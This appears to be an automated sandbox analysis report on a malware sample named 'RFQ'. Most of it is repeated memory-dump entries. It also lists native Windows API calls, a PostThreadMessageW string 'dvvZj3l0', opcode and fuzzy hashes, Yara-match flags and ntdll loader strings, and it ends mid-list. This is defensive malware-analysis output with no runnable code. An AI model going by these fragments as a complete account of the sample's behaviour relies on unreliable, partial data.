                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PH]q$PH]q
                                                                                                        • API String ID: 0-1166926398
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2018253889.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_8f20000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2016994262.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72e0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2016994262.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72e0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                                                        • API String ID: 0-653184299
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.2%
                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                        Signature Coverage:6.8%
                                                                                                        Total number of Nodes:161
                                                                                                        Total number of Limit Nodes:16

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 69 42aa43-42aa7f call 404bd3 call 42bb03 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,?,00000000,k\A,?,00423860,k\A,494CA64B,?,?,?,?,?,?,00426F59), ref: 0042AA7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID: k\A
                                                                                                        • API String ID: 3535843008-2887163533
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 83 416eb3-416edc call 42d613 86 416ee2-416ef0 call 42db33 83->86 87 416ede-416ee1 83->87 90 416f00-416f11 call 42bfd3 86->90 91 416ef2-416efd call 42ddd3 86->91 96 416f13-416f27 LdrLoadDll 90->96 97 416f2a-416f2d 90->97 91->90 96->97
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00416F25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: ff648a7789903fbada3fb52f9b5746c9afea51872dfecb5c18f95975c9bae672
                                                                                                        • Instruction ID: 40b39a719bf4947bc615ecc3e575a2c87d7cb42b9529f368f291647e28415aae
                                                                                                        • Opcode Fuzzy Hash: ff648a7789903fbada3fb52f9b5746c9afea51872dfecb5c18f95975c9bae672
                                                                                                        • Instruction Fuzzy Hash: DD0125B5E0020DABDF10DBE5DC42FDEB7789B54304F00819AE90897240F635EB55CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 112 1a72b60-1a72b6c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b25d68b4206a1da99587b08689d67484be433ef9254dca6cb1bf798a961ac2b6
                                                                                                        • Instruction ID: 8c277c403ad6720c05274daa22a92b7038a66fb338774bd60ee846c3becbde6c
                                                                                                        • Opcode Fuzzy Hash: b25d68b4206a1da99587b08689d67484be433ef9254dca6cb1bf798a961ac2b6
                                                                                                        • Instruction Fuzzy Hash: 9590026120240003410571584454616D00B97E0301F96C021E1014594DC92989916225
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 114 1a72df0-1a72dfc LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 29bfb9e096d7b612a9e27e61d8deb0406608cf5d8914283bbe800f157b77b23f
                                                                                                        • Instruction ID: d664bdb7ec0bd7c758d481bd417416d6cd8e2bb63218bac346e4581aee4ed9bb
                                                                                                        • Opcode Fuzzy Hash: 29bfb9e096d7b612a9e27e61d8deb0406608cf5d8914283bbe800f157b77b23f
                                                                                                        • Instruction Fuzzy Hash: A490023120140413D11171584544707900A97D0341FD6C412A042455CDDA5A8A52A221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 113 1a72c70-1a72c7c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 424d91f9c1cd2fc7d771e0e38edad37dc7985c3a52ac449832f0021b6294b8a5
                                                                                                        • Instruction ID: fe22a100b9547a511de600de7a67f2ef366bd69cec6c757973cc8d8530eba1a7
                                                                                                        • Opcode Fuzzy Hash: 424d91f9c1cd2fc7d771e0e38edad37dc7985c3a52ac449832f0021b6294b8a5
                                                                                                        • Instruction Fuzzy Hash: 6F90023120148802D1107158844474A900697D0301F9AC411A442465CDCA9989917221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f4917dadc3cfcc6c4ee4f5abcd66be0397ae1058d41f53f40a57c5cd9b675ad7
                                                                                                        • Instruction ID: eb552fdd4cc7d6aae4a1e21c8f5fd362416ee8965cf9538c1d883c1145cec495
                                                                                                        • Opcode Fuzzy Hash: f4917dadc3cfcc6c4ee4f5abcd66be0397ae1058d41f53f40a57c5cd9b675ad7
                                                                                                        • Instruction Fuzzy Hash: 5490023160550402D10071584554706A00697D0301FA6C411A042456CDCB998A5166A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: e708315332aaf9e9f5e9ba33ec9520207584772b3ed03077528bac634c00126f
                                                                                                        • Instruction ID: be9a613a0eda02378b01cee609e3b1e15a1b2fff95f298b4320ccd8f6e614275
                                                                                                        • Opcode Fuzzy Hash: e708315332aaf9e9f5e9ba33ec9520207584772b3ed03077528bac634c00126f
                                                                                                        • Instruction Fuzzy Hash: AD01A9B1D4015C7ADB00ABD19C82DEFBB7CDF40A94F058059F914B7141D6785F064BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 15 413543-413562 call 42c9b3 18 413568-4135aa call 416eb3 call 404b43 call 423cb3 15->18 19 413563 call 42d3c3 15->19 26 4135ca-4135d0 18->26 27 4135ac-4135bb PostThreadMessageW 18->27 19->18 27->26 28 4135bd-4135c7 27->28 28->26
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: e6291a16a276211746444435edb1c88096d428be110825000bfd881225e1be02
                                                                                                        • Instruction ID: 22661a58ade3e44b7a514cd97cf3613d7ad26d7428119bd899b8f930f4e9f7ee
                                                                                                        • Opcode Fuzzy Hash: e6291a16a276211746444435edb1c88096d428be110825000bfd881225e1be02
                                                                                                        • Instruction Fuzzy Hash: D10188B2D4025C7ADB10EBD59C81DEFBB7CDF40A94F058059FA04B7241D6785F0647A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 29 4134f9-413562 31 413568-4135aa call 416eb3 call 404b43 call 423cb3 29->31 32 413563 call 42d3c3 29->32 39 4135ca-4135d0 31->39 40 4135ac-4135bb PostThreadMessageW 31->40 32->31 40->39 41 4135bd-4135c7 40->41 41->39
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 64bf0ea5d276cd6bb004fdc4179936fb40e4037f021cc45dbb0ef43b953a3555
                                                                                                        • Instruction ID: 4a6e05ec9a38cb1a868d09b3fe28959a852823fdd71751c5284d48b8aa0c3a54
                                                                                                        • Opcode Fuzzy Hash: 64bf0ea5d276cd6bb004fdc4179936fb40e4037f021cc45dbb0ef43b953a3555
                                                                                                        • Instruction Fuzzy Hash: 330104B2D012587ADB019BA19C82CEFBF7CDE41A58B05C49AFD04A7101D27C8F468BE9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 004135B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 06dbeae3592a7089fca0476ce42a4765a8d494291f75a073380a4a8c4fb7d8d4
                                                                                                        • Instruction ID: b919182ea2c7c68a4f837ce068d55c2ee8d3ab15965a1319f684cf118db248dd
                                                                                                        • Opcode Fuzzy Hash: 06dbeae3592a7089fca0476ce42a4765a8d494291f75a073380a4a8c4fb7d8d4
                                                                                                        • Instruction Fuzzy Hash: 6D01B1B2D402187ADB119B919C81DEFBB7CEF40A54B01809AF904BB240D6789F024BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 64 42ada3-42ade7 call 404bd3 call 42bb03 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042ADE2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: k\A
                                                                                                        • API String ID: 3298025750-2887163533
                                                                                                        • Opcode ID: 9356be0a9fe8cbaa9227ba0530063ee393ada402c610cf3d35d4afa146305b9b
                                                                                                        • Instruction ID: 6e7a423ad0c50b43283c3906e191ee9e45f373a4dc453316e29dfb684fa0af0d
                                                                                                        • Opcode Fuzzy Hash: 9356be0a9fe8cbaa9227ba0530063ee393ada402c610cf3d35d4afa146305b9b
                                                                                                        • Instruction Fuzzy Hash: 2AE06DB12042047BC610EE59EC41FEB77ACEFC9710F004419F908A7242DA70B91087B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 98 42ad53-42ad94 call 404bd3 call 42bb03 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041D678,?,?,00000000,?,0041D678,?,?,?), ref: 0042AD8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 2f83937afba3c77e9cdd549650248ce334a7ce2d5efaac842cf52be4868f9424
                                                                                                        • Instruction ID: 46c047a92bd93528db5555ee1acf7816f76f83662d9afd6a9c2d34aa0dd32a6d
                                                                                                        • Opcode Fuzzy Hash: 2f83937afba3c77e9cdd549650248ce334a7ce2d5efaac842cf52be4868f9424
                                                                                                        • Instruction Fuzzy Hash: 3BE039712046047BCA14EE59DC41FAB37ADEB88710F004419F908A7242DA71B920C7B8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 103 42adf3-42ae2f call 404bd3 call 42bb03 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,?,?,04411C3F,?,?,04411C3F), ref: 0042AE2A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_RFQ.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 108 1a72c0a-1a72c0f 109 1a72c11-1a72c18 108->109 110 1a72c1f-1a72c26 LdrInitializeThunk 108->110
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AA540A, 01AA5496, 01AA5519
                                                                                                        • Invalid debug info address of this critical section, xrefs: 01AA54B6
                                                                                                        • corrupted critical section, xrefs: 01AA54C2
                                                                                                        • Critical section address, xrefs: 01AA5425, 01AA54BC, 01AA5534
                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AA54E2
                                                                                                        • double initialized or corrupted critical section, xrefs: 01AA5508
                                                                                                        • 8, xrefs: 01AA52E3
